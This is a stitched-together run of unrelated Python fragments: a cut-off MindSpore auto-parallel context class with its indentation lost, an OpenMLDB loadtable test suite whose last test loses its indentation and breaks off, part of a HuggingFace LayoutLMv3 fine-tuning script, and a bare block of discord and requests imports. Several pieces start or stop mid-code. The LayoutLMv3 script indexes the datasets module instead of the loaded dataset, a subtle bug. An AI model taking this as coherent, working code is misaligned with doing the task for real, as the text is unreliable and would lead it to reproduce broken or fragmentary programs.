return self._context_handle.get_costmodel_communi_bias()
def set_multi_subgraphs(self, multi_subgraph):
"""
Set the flag of ANF graph containing multiple subgraphs.
Args:
multi_subgraph (bool): A parameter used in marking the multi-subgraphs flag.
Raises:
ValueError: If context handle is none.
"""
if self._context_handle is None:
raise ValueError("Context handle is none in context!!!")
self._context_handle.set_multi_subgraphs(multi_subgraph)
def get_multi_subgraphs(self):
"""
Get the flag of ANF graph containing multiple subgraphs.
Raises:
ValueError: If context handle is none.
"""
if self._context_handle is None:
raise ValueError("Context handle is none in context!!!")
return self._context_handle.get_multi_subgraphs()
def set_run_phase(self, phase):
"""
Set the flag of running phase: training (0) or inference (1)
Args:
phase (int): A parameter indicating which phase is running.
Raises:
ValueError: If context handle is none, or phase is not in {0, 1}.
"""
if self._context_handle is None:
raise ValueError("Context handle is none in context!!!")
if phase not in (0, 1):
raise ValueError("The argument of set_run_phase() must be '0' or '1', but got {}".format(phase))
self._context_handle.set_run_phase(phase)
def get_run_phase(self):
"""
Get the flag of running phase.
Raises:
ValueError: If context handle is none.
"""
if self._context_handle is None:
raise ValueError("Context handle is none in context!!!")
return self._context_handle.get_run_phase()
def set_dp_algo_single_loop(self, single_loop):
"""
Set the flag of generating a single suite of OperatorInfos in for-loop.
Args:
single_loop (bool): The parameter for the single loop flag.
Raises:
ValueError: If context handle is none.
"""
if self._context_handle is None:
raise ValueError("Context handle is none in context!!!")
self._context_handle.set_dp_algo_single_loop(single_loop)
def get_dp_algo_single_loop(self):
"""
Get the flag of whether or not generating a single suite of OperatorInfos in for-loop.
Raises:
ValueError: If context handle is none.
"""
if self._context_handle is None:
raise ValueError("Context handle is none in context!!!")
return self._context_handle.get_dp_algo_single_loop()
def set_costmodel_allreduce_fusion_algorithm(self, algorithm):
"""
Set costmodel allreduce fusion algorithm.
Args:
algorithm (int): The AllReduce fusion algorithm of parameter gradients.
Raises:
ValueError: If context handle is none.
"""
if self._context_handle is None:
raise ValueError("Context handle is none in context!!!")
self._context_handle.set_costmodel_allreduce_fusion_algorithm(algorithm)
def get_costmodel_allreduce_fusion_algorithm(self):
"""
Get costmodel allreduce fusion algorithm.
Raises:
ValueError: If context handle is none.
"""
if self._context_handle is None:
raise ValueError("Context handle is none in context!!!")
return self._context_handle.get_costmodel_allreduce_fusion_algorithm()
def set_costmodel_allreduce_fusion_times(self, allreduce_fusion_times):
"""
Set costmodel allreduce fusion times.
Args:
allreduce_fusion_times (int): The AllReduce fusion times of parameter gradients.
Raises:
ValueError: If context handle is none.
"""
if self._context_handle is None:
raise ValueError("Context handle is none in context!!!")
self._context_handle.set_costmodel_allreduce_fusion_times(allreduce_fusion_times)
def get_costmodel_allreduce_fusion_times(self):
"""
Get costmodel allreduce fusion times.
Raises:
ValueError: If context handle is none.
"""
if self._context_handle is None:
raise ValueError("Context handle is none in context!!!")
return self._context_handle.get_costmodel_allreduce_fusion_times()
def set_costmodel_allreduce_fusion_tail_percent(self, tail_percent):
"""
Set costmodel allreduce fusion tail percent.
Args:
tail_percent (int): The percentage of backward computing time corresponding to the last parameter gradients
AllReduce in the whole backward computing time.
Raises:
ValueError: If context handle is none.
"""
if self._context_handle is None:
raise ValueError("Context handle is none in context!!!")
self._context_handle.set_costmodel_allreduce_fusion_tail_percent(tail_percent)
def get_costmodel_allreduce_fusion_tail_percent(self):
"""
Get costmodel allreduce fusion tail percent.
Raises:
ValueError: If context handle is none.
"""
if self._context_handle is None:
raise ValueError("Context handle is none in context!!!")
return self._context_handle.get_costmodel_allreduce_fusion_tail_percent()
def set_costmodel_allreduce_fusion_tail_time(self, tail_time):
"""
Set costmodel allreduce fusion tail time.
Args:
tail_time (int): The tail time of the last parameter gradients AllReduce after the end of backward
computation.
Raises:
ValueError: If context handle is none.
"""
if self._context_handle is None:
raise ValueError("Context handle is none in context!!!")
self._context_handle.set_costmodel_allreduce_fusion_tail_time(tail_time)
def get_costmodel_allreduce_fusion_tail_time(self):
"""
Get costmodel allreduce fusion tail time.
Raises:
ValueError: If context handle is none.
"""
if self._context_handle is None:
raise ValueError("Context handle is none in context!!!")
return self._context_handle.get_costmodel_allreduce_fusion_tail_time()
def set_costmodel_allreduce_fusion_allreduce_inherent_time(self, allreduce_inherent_time):
"""
Set costmodel allreduce fusion allreduce inherent time.
Args:
allreduce_inherent_time (int): The inherent cost time of AllReduce.
Raises:
ValueError: If context handle is none.
"""
if self._context_handle is None:
raise ValueError("Context handle is none in context!!!")
self._context_handle.set_costmodel_allreduce_fusion_allreduce_inherent_time(allreduce_inherent_time)
def get_costmodel_allreduce_fusion_allreduce_inherent_time(self):
"""
Get costmodel allreduce fusion allreduce inherent time.
Raises:
ValueError: If context handle is none.
"""
if self._context_handle is None:
raise ValueError("Context handle is none in context!!!")
return self._context_handle.get_costmodel_allreduce_fusion_allreduce_inherent_time()
def set_costmodel_allreduce_fusion_allreduce_bandwidth(self, allreduce_bandwidth):
"""
Set costmodel allreduce fusion allreduce bandwidth.
Args:
allreduce_bandwidth (int): The bandwidth of AllReduce.
Raises:
ValueError: If context handle is none.
"""
if self._context_handle is None:
raise ValueError("Context handle is none in | |
<gh_stars>1000+
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Copyright 2021 4Paradigm
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# -*- coding: utf-8 -*-
from testcasebase import TestCaseBase
import time
import threading
from libs.test_loader import load
from libs.deco import multi_dimension
import libs.utils as utils
from libs.logger import infoLogger
class TestLoadTable(TestCaseBase):
    def test_loadtable_newleader_success_can_put(self):
        """
        After copying the db directory, loadtable works correctly.
        The new node is a leader and accepts puts after loadtable.
        :return:
        """
        rs1 = self.create(self.leader, 't', self.tid, self.pid)
        self.assertIn('Create table ok', rs1)
        for i in range(0, 6):
            self.put(self.leader,
                     self.tid,
                     self.pid,
                     'testkey',
                     self.now() - i,
                     'testvalue')
        rs2 = self.makesnapshot(self.leader, self.tid, self.pid)
        self.assertIn('MakeSnapshot ok', rs2)
        # Copy the table directory to the new node
        self.cp_db(self.leaderpath, self.slave1path, self.tid, self.pid)
        # The new leader node accepts puts after loadtable
        rs3 = self.loadtable(self.slave1, 't', self.tid, self.pid, 144000, 8, 'true')
        self.assertIn('LoadTable ok', rs3)
        table_status = self.get_table_status(self.slave1, self.tid, self.pid)
        self.assertEqual(table_status[:6], ['6', 'kTableLeader', 'kTableNormal', 'true', '144000min', '0s'])
        # for multidimension test
        self.multidimension_vk = {'card': ('string:index', 'testkey111'),
                                  'merchant': ('string:index', 'testvalue111'),
                                  'amt': ('double', 1.1)}
        self.multidimension_scan_vk = {'card': 'testkey111'}
        rs4 = self.put(self.slave1,
                       self.tid,
                       self.pid,
                       'testkey111',
                       self.now(),
                       'testvalue111')
        self.assertIn('Put ok', rs4)
        self.assertIn(
            'testvalue111', self.scan(self.slave1, self.tid, self.pid, 'testkey111', self.now(), 1))
    def test_loadtable_newslave_success_cannot_put(self):
        """
        After copying the db directory, loadtable works correctly.
        The new node is a follower, so puts are rejected after loadtable.
        :return:
        """
        rs1 = self.create(self.leader, 't', self.tid, self.pid)
        self.assertIn('Create table ok', rs1)
        for i in range(0, 6):
            self.put(self.leader,
                     self.tid,
                     self.pid,
                     'testkey',
                     self.now() - i,
                     'testvalue')
        time.sleep(1)
        rs2 = self.makesnapshot(self.leader, self.tid, self.pid)
        self.assertIn('MakeSnapshot ok', rs2)
        # Copy the table directory to the new node
        self.cp_db(self.leaderpath, self.slave1path, self.tid, self.pid)
        # The new follower node must reject puts after loadtable
        rs3 = self.loadtable(self.slave1, 't', self.tid, self.pid)
        self.assertIn('LoadTable ok', rs3)
        table_status = self.get_table_status(self.slave1, self.tid, self.pid)
        self.assertEqual(table_status[:6], ['6', 'kTableFollower', 'kTableNormal', 'true', '144000min', '0s'])
        # for multidimension test
        self.multidimension_vk = {'card': ('string:index', 'testkey111'),
                                  'merchant': ('string:index', 'testvalue111'),
                                  'amt': ('double', 1.1)}
        rs4 = self.put(self.slave1,
                       self.tid,
                       self.pid,
                       'testkey111',
                       self.now(),
                       'testvalue111')
        self.assertIn('Put failed', rs4)
        self.multidimension_scan_vk = {'card': 'testkey111'}  # for multidimension test
        self.assertFalse(
            'testvalue111' in self.scan(self.slave1, self.tid, self.pid, 'testkey111', self.now(), 1))
    def test_loadtable_failed_after_drop(self):
        """
        A table cannot be loaded again after it has been dropped.
        :return:
        """
        rs1 = self.create(self.leader, 't', self.tid, self.pid)
        self.assertIn('Create table ok', rs1)
        for i in range(0, 3):
            self.put(self.leader,
                     self.tid,
                     self.pid,
                     'testkey',
                     self.now() - i,
                     'testvalue')
        rs2 = self.makesnapshot(self.leader, self.tid, self.pid)
        self.assertIn('MakeSnapshot ok', rs2)
        rs3 = self.drop(self.leader, self.tid, self.pid)
        self.assertIn('Drop table ok', rs3)
        time.sleep(1)
        rs4 = self.loadtable(self.leader, 't', self.tid, self.pid, 144000, 8, 'true')
        self.assertFalse('Fail' not in rs4)
    @multi_dimension(False)
    def test_loadtable_andthen_sync_from_leader(self):
        """
        After loadtable, a follower can sync data written to the leader afterwards.
        :return:
        """
        rs1 = self.create(self.leader, 't', self.tid, self.pid, 144000, 8, 'true')
        self.assertIn('Create table ok', rs1)
        rs = self.addreplica(self.leader, self.tid, self.pid, 'client', self.slave1)
        self.assertIn('AddReplica ok', rs)
        self.put(self.leader,
                 self.tid,
                 self.pid,
                 'k1',
                 self.now(),
                 'v1')
        time.sleep(1)
        rs2 = self.makesnapshot(self.leader, self.tid, self.pid)
        self.assertIn('MakeSnapshot ok', rs2)
        # Copy the table directory to the new node
        self.cp_db(self.leaderpath, self.slave1path, self.tid, self.pid)
        rs3 = self.loadtable(self.slave1, 't', self.tid, self.pid, 144000, 8, 'false', self.slave1)
        self.assertIn('LoadTable ok', rs3)
        table_status = self.get_table_status(self.slave1, self.tid, self.pid)
        self.assertEqual(table_status[:6], ['1', 'kTableFollower', 'kTableNormal', 'true', '144000min', '0s'])
        rs4 = self.put(self.leader,
                       self.tid,
                       self.pid,
                       'k2',
                       self.now(),
                       'v2')
        self.assertIn('Put ok', rs4)
        time.sleep(1)
        table_status = self.get_table_status(self.slave1, self.tid, self.pid)
        self.assertEqual(table_status[:6], ['2', 'kTableFollower', 'kTableNormal', 'true', '144000min', '0s'])
        self.assertIn('v1', self.scan(self.slave1, self.tid, self.pid, 'k1', self.now(), 1))
        self.assertIn('v2', self.scan(self.slave1, self.tid, self.pid, 'k2', self.now(), 1))
    @multi_dimension(True)
    def test_loadtable_andthen_sync_from_leader_md(self):
        """
        After loadtable, a follower can sync data written to the leader
        afterwards (multi-dimension variant).
        :return:
        """
        rs1 = self.create(self.leader, 't', self.tid, self.pid, 144000, 8, 'true')
        self.assertIn('Create table ok', rs1)
        self.put(self.leader,
                 self.tid,
                 self.pid,
                 '',
                 self.now(),
                 'v1', '1.1', 'k1')
        time.sleep(1)
        rs2 = self.makesnapshot(self.leader, self.tid, self.pid)
        self.assertIn('MakeSnapshot ok', rs2)
        # Copy the table directory to the new node
        self.cp_db(self.leaderpath, self.slave1path, self.tid, self.pid)
        rs3 = self.loadtable(self.slave1, 't', self.tid, self.pid, 144000, 8, 'false')
        self.assertIn('LoadTable ok', rs3)
        rs4 = self.addreplica(self.leader, self.tid, self.pid, 'client', self.slave1)
        self.assertIn('AddReplica ok', rs4)
        table_status = self.get_table_status(self.slave1, self.tid, self.pid)
        self.assertEqual(table_status[:6], ['1', 'kTableFollower', 'kTableNormal', 'true', '144000min', '0s'])
        rs3 = self.put(self.leader, self.tid, self.pid, '', self.now(), 'v2', '1.1', 'k2')
        self.assertIn('Put ok', rs3)
        time.sleep(1)
        table_status = self.get_table_status(self.slave1, self.tid, self.pid)
        self.assertEqual(table_status[:6], ['2', 'kTableFollower', 'kTableNormal', 'true', '144000min', '0s'])
        self.assertIn('v1', self.scan(self.slave1, self.tid, self.pid, {'card':'k1'}, self.now(), 1))
        self.assertIn('v2', self.scan(self.slave1, self.tid, self.pid, {'card':'k2'}, self.now(), 1))
    @multi_dimension(False)
    def test_loadtable_ttl_removed_expired_key(self):
        """
        Node 1 inserts partially expired data and makes a snapshot.
        The db directory is copied to node 2.
        Node 2 discards expired keys during loadtable.
        :return:
        """
        rs1 = self.create(self.leader, 't', self.tid, self.pid)
        self.assertIn('Create table ok', rs1)
        for i in range(0, 6):
            self.put(self.leader,
                     self.tid,
                     self.pid,
                     'testkey{}'.format(i),
                     self.now() - (100000000000 * (i % 2) + 1),
                     'testvalue{}'.format(i))
        rs2 = self.makesnapshot(self.leader, self.tid, self.pid)
        self.assertIn('MakeSnapshot ok', rs2)
        time.sleep(3)
        # Copy the table directory to the new node
        self.cp_db(self.leaderpath, self.slave1path, self.tid, self.pid)
        rs3 = self.loadtable(self.slave1, 't', self.tid, self.pid)
        self.assertIn('LoadTable ok', rs3)
        # Unexpired keys can be scanned; expired keys cannot
        self.assertIn('testvalue0', self.scan(self.slave1, self.tid, self.pid, 'testkey0', self.now(), 1))
        self.assertFalse('testvalue1' in self.scan(self.slave1, self.tid, self.pid, 'testkey1', self.now(), 1))
        table_status = self.get_table_status(self.leader, self.tid, self.pid)
        self.assertEqual(table_status[:6], ['6', 'kTableLeader', 'kTableNormal', 'true', '144000min', '0s'])
    @multi_dimension(True)
    def test_loadtable_ttl_removed_expired_key_md(self):
        """
        Node 1 inserts partially expired data and makes a snapshot.
        The db directory is copied to node 2.
        Node 2 discards expired keys during loadtable (multi-dimension variant).
        :return:
        """
        kv = {'card': ('string:index', ''), 'card2': ('string', '')}
        self.create(self.leader, 't', self.tid, self.pid, 144000, 2, 'true', **{k: v[0] for k, v in kv.items()})
        for i in range(6):
            kv = {'card': ('string:index', 'card' + str(i)), 'card2': ('string', 'value' + str(i))}
            self.put(self.leader, self.tid, self.pid, '',
                     self.now() - (100000000000 * (i % 2) + 1),
                     *[str(v[1]) for v in kv.values()])
        rs2 = self.makesnapshot(self.leader, self.tid, self.pid)
        self.assertIn('MakeSnapshot ok', rs2)
        time.sleep(3)
        self.cp_db(self.leaderpath, self.slave1path, self.tid, self.pid)
        rs3 = self.loadtable(self.slave1, 't', self.tid, self.pid)
        self.assertIn('LoadTable ok', rs3)
        # Unexpired keys can be scanned; expired keys cannot
        self.assertIn('value0', self.scan(self.slave1, self.tid, self.pid, {'card': 'card0'}, self.now(), 1))
        self.assertNotIn('value1', self.scan(self.slave1, self.tid, self.pid, {'card': 'card1'}, self.now(), 1))
        table_status = self.get_table_status(self.leader, self.tid, self.pid)
        self.assertEqual(table_status[:6], ['6', 'kTableLeader', 'kTableNormal', 'true', '144000min', '0s'])
    def test_loadtable_ttl_zero(self):
        """
        With ttl 0, loadtable loads all data and nothing expires.
        :return:
        """
        rs1 = self.create(self.leader, 't', self.tid, self.pid, 0)
        self.assertIn('Create table ok', rs1)
        for i in range(0, 3):
            # for multidimension test
            self.multidimension_vk = {'card': ('string:index', 'testkey{}'.format(i)),
                                      'merchant': ('string:index', 'testvalue{}'.format(i)),
                                      'amt': ('double', 1.1)}
            self.put(self.leader,
                     self.tid,
                     self.pid,
                     'testkey{}'.format(i),
                     self.now() - 100000000000,
                     'testvalue{}'.format(i))
        rs2 = self.makesnapshot(self.leader, self.tid, self.pid)
        self.assertIn('MakeSnapshot ok', rs2)
        # Copy the table directory to the new node
        self.cp_db(self.leaderpath, self.slave1path, self.tid, self.pid)
        rs3 = self.loadtable(self.slave1, 't', self.tid, self.pid, 0)
        self.assertIn('LoadTable ok', rs3)
        # Nothing expires; every key can be scanned
        for i in range(0, 3):
            self.multidimension_scan_vk = {'card': 'testkey{}'.format(i)}  # for multidimension test
            rs = self.scan(self.slave1, self.tid, self.pid, 'testkey{}'.format(i), self.now(), 1)
            self.assertIn('testvalue{}'.format(i), rs)
    def test_loadtable_failed_table_exist(self):
        """
        loadtable is rejected when the table already exists.
        :return:
        """
        rs1 = self.create(self.leader, 't', self.tid, self.pid)
        self.assertIn('Create table ok', rs1)
        self.put(self.leader,
                 self.tid,
                 self.pid,
                 'testkey',
                 self.now(),
                 'testvalue')
        rs2 = self.makesnapshot(self.leader, self.tid, self.pid)
        self.assertIn('MakeSnapshot ok', rs2)
        # Create the table on the new node first
        rs3 = self.create(self.slave1, 't', self.tid, self.pid)
        self.assertIn('Create table ok', rs3)
        # Copy the table directory to the new node
        self.cp_db(self.leaderpath, self.slave1path, self.tid, self.pid)
        rs4 = self.loadtable(self.slave1, 't', self.tid, self.pid)
        self.assertIn('Fail to LoadTable', rs4)
    def test_loadtable_can_be_pausedsnapshot_after_loadtable(self):
        """
        After loadtable, the snapshot can be paused normally.
        :return:
        """
        rs1 = self.create(self.leader, 't', self.tid, self.pid)
        self.assertIn('Create table ok', rs1)
        self.put(self.leader,
                 self.tid,
                 self.pid,
                 'testkey',
                 self.now(),
                 'testvalue')
        rs2 = self.makesnapshot(self.leader, self.tid, self.pid)
        self.assertIn('MakeSnapshot ok', rs2)
        # Copy the table directory to the new node
        self.cp_db(self.leaderpath, self.slave1path, self.tid, self.pid)
        rs3 = self.loadtable(self.slave1, 't', self.tid, self.pid)
        self.assertIn('LoadTable ok', rs3)
        rs4 = self.pausesnapshot(self.slave1, self.tid, self.pid)
        self.assertIn('PauseSnapshot ok', rs4)
        table_status = self.get_table_status(self.slave1, self.tid, self.pid)
        self.assertEqual(table_status[:6], ['1', 'kTableFollower', 'kSnapshotPaused', 'true', '144000min', '0s'])
    # @multi_dimension(False)
    def test_loadtable_by_snapshot_and_binlog(self):
        """
        loadtable from both the snapshot and the binlog.
        :return:
        """
        rs1 = self.create(self.leader, 't', self.tid, self.pid)
        self.assertIn('Create table ok', rs1)
        for i in range(0, 3):
            # for multidimension test
            self.multidimension_vk = {'card': ('string:index', 'testkey{}'.format(i)),
                                      'merchant': ('string:index', 'testvalue{}'.format(i)),
                                      'amt': ('double', 1.1)}
            self.put(self.leader,
                     self.tid,
                     self.pid,
                     'testkey{}'.format(i),
                     self.now() - i,
                     'testvalue{}'.format(i))
        rs2 = self.makesnapshot(self.leader, self.tid, self.pid)
        self.assertIn('MakeSnapshot ok', rs2)
        # These rows are written after the snapshot, so they only exist in the binlog
        for i in range(3, 6):
            # for multidimension test
            self.multidimension_vk = {'card': ('string:index', 'testkey{}'.format(i)),
                                      'merchant': ('string:index', 'testvalue{}'.format(i)),
                                      'amt': ('double', 1.1)}
            self.put(self.leader,
                     self.tid,
                     self.pid,
                     'testkey{}'.format(i),
                     self.now() - i,
                     'testvalue{}'.format(i))
        # Copy the table directory to the new node
        self.cp_db(self.leaderpath, self.slave1path, self.tid, self.pid)
        rs3 = self.loadtable(self.slave1, 't', self.tid, self.pid)
        self.assertIn('LoadTable ok', rs3)
        for i in range(0, 6):
            self.multidimension_scan_vk = {'card': 'testkey{}'.format(i)}  # for multidimension test
            rs = self.scan(self.slave1, self.tid, self.pid, 'testkey{}'.format(i), self.now(), 1)
            self.assertIn('testvalue{}'.format(i), rs)
    def test_loadtable_by_binlog_success(self):
        """
        loadtable from the binlog only.
        :return:
        """
        rs1 = self.create(self.leader, 't', self.tid, self.pid)
        self.assertIn('Create table ok', rs1)
        self.put(self.leader,
                 self.tid,
                 self.pid,
                 'testkey',
                 self.now() - 10,
                 'testvalue')
        rs2 = self.makesnapshot(self.leader, self.tid, self.pid)
        self.assertIn('MakeSnapshot ok', rs2)
        # Copy the table directory to the new node, then delete the snapshot
        # directory so only the binlog directory remains
        self.cp_db(self.leaderpath, self.slave1path, self.tid, self.pid)
        utils.exe_shell('rm -rf {}/db/{}_{}/snapshot/*'.format(self.slave1path, self.tid, self.pid))
        rs3 = self.loadtable(self.slave1, 't', self.tid, self.pid)
        self.assertIn('LoadTable ok', rs3)
        self.assertIn('testvalue', self.scan(self.slave1, self.tid, self.pid, 'testkey', self.now(), 1))
        rs4 = self.makesnapshot(self.slave1, self.tid, self.pid)
        self.assertIn('MakeSnapshot ok', rs4)
        mf = self.get_manifest(self.slave1path, self.tid, self.pid)
        self.assertEqual(mf['offset'], '1')
        self.assertTrue(mf['name'])
        self.assertEqual(mf['count'], '1')
def test_loadtable_by_binlog_ttl(self):
"""
binlog中包含过期数据
通过binlog loadtable,剔除过期数据
再makesnapshot可以成功
:return:
"""
rs1 = self.create(self.leader, 't', self.tid, self.pid)
self.assertIn('Create table ok', rs1)
for i in range(0, 4):
# for multidimension test
self.multidimension_vk = {'card': | |
#!/usr/bin/env python
# coding=utf-8
# Copyright 2022 The HuggingFace Team All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Fine-tuning LayoutLMv3 for token classification on FUNSD or CORD.
"""
# You can also adapt this script on your own token classification task and datasets. Pointers for this are left as
# comments.
import logging
import os
import sys
from dataclasses import dataclass, field
from typing import Optional
import datasets
import numpy as np
from datasets import ClassLabel, load_dataset, load_metric
import transformers
from transformers import (
AutoConfig,
AutoModelForTokenClassification,
AutoProcessor,
HfArgumentParser,
Trainer,
TrainingArguments,
set_seed,
)
from transformers.data.data_collator import default_data_collator
from transformers.trainer_utils import get_last_checkpoint
from transformers.utils import check_min_version
from transformers.utils.versions import require_version
# Will error if the minimal version of Transformers is not installed. Remove at your own risks.
check_min_version("4.19.0.dev0")
# Fail fast with an actionable message if the installed `datasets` package is too old.
require_version("datasets>=1.8.0", "To fix: pip install -r examples/pytorch/token-classification/requirements.txt")
# Module-level logger; its verbosity is configured in main() from the training arguments.
logger = logging.getLogger(__name__)
@dataclass
class ModelArguments:
    """
    Arguments pertaining to which model/config/tokenizer we are going to fine-tune from.
    """
    # HF Hub identifier or local path of the base checkpoint to fine-tune.
    model_name_or_path: str = field(
        default="microsoft/layoutlmv3-base",
        metadata={"help": "Path to pretrained model or model identifier from huggingface.co/models"},
    )
    # Optional override when the config lives under a different name/path than the model.
    config_name: Optional[str] = field(
        default=None, metadata={"help": "Pretrained config name or path if not the same as model_name"}
    )
    # Optional override when the processor files live under a different name/path than the model.
    processor_name: Optional[str] = field(
        default=None, metadata={"help": "Name or path to the processor files if not the same as model_name"}
    )
    cache_dir: Optional[str] = field(
        default=None,
        metadata={"help": "Where do you want to store the pretrained models downloaded from huggingface.co"},
    )
    # Branch name, tag name or commit id to pin the checkpoint to.
    model_revision: str = field(
        default="main",
        metadata={"help": "The specific model version to use (can be a branch name, tag name or commit id)."},
    )
    # Needed for private models; reads the token created by `transformers-cli login`.
    use_auth_token: bool = field(
        default=False,
        metadata={
            "help": (
                "Will use the token generated when running `transformers-cli login` (necessary to use this script "
                "with private models)."
            )
        },
    )
@dataclass
class DataTrainingArguments:
    """
    Arguments pertaining to what data we are going to input our model for training and eval.
    """
    task_name: Optional[str] = field(default="ner", metadata={"help": "The name of the task (ner, pos...)."})
    dataset_name: Optional[str] = field(
        default="nielsr/funsd-layoutlmv3",
        metadata={"help": "The name of the dataset to use (via the datasets library)."},
    )
    dataset_config_name: Optional[str] = field(
        default=None, metadata={"help": "The configuration name of the dataset to use (via the datasets library)."}
    )
    train_file: Optional[str] = field(
        default=None, metadata={"help": "The input training data file (a csv or JSON file)."}
    )
    validation_file: Optional[str] = field(
        default=None,
        metadata={"help": "An optional input evaluation data file to evaluate on (a csv or JSON file)."},
    )
    test_file: Optional[str] = field(
        default=None,
        metadata={"help": "An optional input test data file to predict on (a csv or JSON file)."},
    )
    text_column_name: Optional[str] = field(
        default=None, metadata={"help": "The column name of text to input in the file (a csv or JSON file)."}
    )
    label_column_name: Optional[str] = field(
        default=None, metadata={"help": "The column name of label to input in the file (a csv or JSON file)."}
    )
    overwrite_cache: bool = field(
        default=False, metadata={"help": "Overwrite the cached training and evaluation sets"}
    )
    preprocessing_num_workers: Optional[int] = field(
        default=None,
        metadata={"help": "The number of processes to use for the preprocessing."},
    )
    max_seq_length: int = field(
        default=512,
        metadata={
            "help": (
                "The maximum total input sequence length after tokenization. If set, sequences longer "
                "than this will be truncated, sequences shorter will be padded."
            )
        },
    )
    max_train_samples: Optional[int] = field(
        default=None,
        metadata={
            "help": (
                "For debugging purposes or quicker training, truncate the number of training examples to this "
                "value if set."
            )
        },
    )
    max_eval_samples: Optional[int] = field(
        default=None,
        metadata={
            "help": (
                "For debugging purposes or quicker training, truncate the number of evaluation examples to this "
                "value if set."
            )
        },
    )
    max_predict_samples: Optional[int] = field(
        default=None,
        metadata={
            "help": (
                "For debugging purposes or quicker training, truncate the number of prediction examples to this "
                "value if set."
            )
        },
    )
    label_all_tokens: bool = field(
        default=False,
        metadata={
            "help": (
                "Whether to put the label for one word on all tokens of generated by that word or just on the "
                "one (in which case the other tokens will have a padding index)."
            )
        },
    )
    return_entity_level_metrics: bool = field(
        default=False,
        metadata={"help": "Whether to return all the entity levels during evaluation or just the overall ones."},
    )

    def __post_init__(self):
        """Validate the configured data sources and normalize ``task_name``.

        Raises:
            ValueError: if neither a dataset name nor a training/validation file
                is given, or if a provided data file is not ``.csv``/``.json``.
        """
        if self.dataset_name is None and self.train_file is None and self.validation_file is None:
            raise ValueError("Need either a dataset name or a training/validation file.")
        # These checks previously used `assert`, which is silently stripped under
        # `python -O`; raise explicitly so invalid files always fail fast.
        if self.train_file is not None:
            extension = self.train_file.split(".")[-1]
            if extension not in ["csv", "json"]:
                raise ValueError("`train_file` should be a csv or a json file.")
        if self.validation_file is not None:
            extension = self.validation_file.split(".")[-1]
            if extension not in ["csv", "json"]:
                raise ValueError("`validation_file` should be a csv or a json file.")
        self.task_name = self.task_name.lower()
def main():
# See all possible arguments in src/transformers/training_args.py
# or by passing the --help flag to this script.
# We now keep distinct sets of args, for a cleaner separation of concerns.
parser = HfArgumentParser((ModelArguments, DataTrainingArguments, TrainingArguments))
if len(sys.argv) == 2 and sys.argv[1].endswith(".json"):
# If we pass only one argument to the script and it's the path to a json file,
# let's parse it to get our arguments.
model_args, data_args, training_args = parser.parse_json_file(json_file=os.path.abspath(sys.argv[1]))
else:
model_args, data_args, training_args = parser.parse_args_into_dataclasses()
# Setup logging
logging.basicConfig(
format="%(asctime)s - %(levelname)s - %(name)s - %(message)s",
datefmt="%m/%d/%Y %H:%M:%S",
handlers=[logging.StreamHandler(sys.stdout)],
)
log_level = training_args.get_process_log_level()
logger.setLevel(log_level)
datasets.utils.logging.set_verbosity(log_level)
transformers.utils.logging.set_verbosity(log_level)
transformers.utils.logging.enable_default_handler()
transformers.utils.logging.enable_explicit_format()
# Log on each process the small summary:
logger.warning(
f"Process rank: {training_args.local_rank}, device: {training_args.device}, n_gpu: {training_args.n_gpu}"
+ f"distributed training: {bool(training_args.local_rank != -1)}, 16-bits training: {training_args.fp16}"
)
logger.info(f"Training/evaluation parameters {training_args}")
# Detecting last checkpoint.
last_checkpoint = None
if os.path.isdir(training_args.output_dir) and training_args.do_train and not training_args.overwrite_output_dir:
last_checkpoint = get_last_checkpoint(training_args.output_dir)
if last_checkpoint is None and len(os.listdir(training_args.output_dir)) > 0:
raise ValueError(
f"Output directory ({training_args.output_dir}) already exists and is not empty. "
"Use --overwrite_output_dir to overcome."
)
elif last_checkpoint is not None and training_args.resume_from_checkpoint is None:
logger.info(
f"Checkpoint detected, resuming training at {last_checkpoint}. To avoid this behavior, change "
"the `--output_dir` or add `--overwrite_output_dir` to train from scratch."
)
# Set seed before initializing model.
set_seed(training_args.seed)
# Get the datasets
# In distributed training, the load_dataset function guarantee that only one local process can concurrently
# download the dataset.
if data_args.dataset_name == "funsd":
# Downloading and loading a dataset from the hub.
dataset = load_dataset(
"nielsr/funsd-layoutlmv3",
data_args.dataset_config_name,
cache_dir=model_args.cache_dir,
use_auth_token=True if model_args.use_auth_token else None,
)
elif data_args.dataset_name == "cord":
# Downloading and loading a dataset from the hub.
dataset = load_dataset(
"nielsr/cord-layoutlmv3",
data_args.dataset_config_name,
cache_dir=model_args.cache_dir,
use_auth_token=True if model_args.use_auth_token else None,
)
else:
raise ValueError("This script only supports either FUNSD or CORD out-of-the-box.")
if training_args.do_train:
column_names = dataset["train"].column_names
features = dataset["train"].features
else:
column_names = dataset["test"].column_names
features = dataset["test"].features
image_column_name = "image"
text_column_name = "words" if "words" in column_names else "tokens"
boxes_column_name = "bboxes"
label_column_name = (
f"{data_args.task_name}_tags" if f"{data_args.task_name}_tags" in column_names else column_names[1]
)
remove_columns = column_names
# In the event the labels are not a `Sequence[ClassLabel]`, we will need to go through the dataset to get the
# unique labels.
def get_label_list(labels):
unique_labels = set()
for label in labels:
unique_labels = unique_labels | set(label)
label_list = list(unique_labels)
label_list.sort()
return label_list
# If the labels are of type ClassLabel, they are already integers and we have the map stored somewhere.
# Otherwise, we have to get the list of labels manually.
if isinstance(features[label_column_name].feature, ClassLabel):
label_list = features[label_column_name].feature.names
# No need to convert the labels since they are already ints.
id2label = {k: v for k, v in enumerate(label_list)}
label2id = {v: k for k, v in enumerate(label_list)}
else:
label_list = get_label_list(datasets["train"][label_column_name])
id2label = {k: v for k, v in enumerate(label_list)}
label2id = {v: k for k, v in enumerate(label_list)}
num_labels = len(label_list)
# Load pretrained model and processor
#
# Distributed training:
# The .from_pretrained methods guarantee that only one local process can concurrently
| |
import discord
import asyncio
import requests
import time
